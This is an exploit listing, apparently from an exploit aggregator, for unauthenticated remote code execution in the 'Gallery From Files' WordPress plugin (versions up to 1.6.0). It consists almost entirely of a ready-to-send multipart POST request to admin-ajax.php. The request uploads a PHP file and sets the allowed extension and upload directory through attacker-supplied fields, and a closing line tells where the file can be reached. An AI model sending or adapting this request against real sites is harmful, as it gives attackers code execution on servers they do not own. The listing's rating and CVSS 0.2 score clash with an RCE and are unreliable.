Exploit for Gallery From Files <= 1.6.0 - Unauthenticated RCE

Name: Exploit for Gallery From Files <= 1.6.0 - Unauthenticated RCE
Rating: 5 (349 reviews)

2021-05-26 | CVSS 0.2

## https://sploitus.com/exploit?id=WPEX-ID:426CF3B5-1BB7-4E81-B240-F3C962590721
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------245018834521283925753967681812
Content-Length: 765
Connection: close

-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="myfile[]"; filename="test.php4"
Content-Type: plain/php

<?php echo 'failed'; ?>
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="action"

gallery_from_files_595_fileupload
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="filesName"

myfile
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="allowExt"

php4
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="uploadDir"

/var/www/
-----------------------------245018834521283925753967681812--


The file will be at the root of the blog (assuming the blog is at /var/www/), ie https://example.com/test.php4.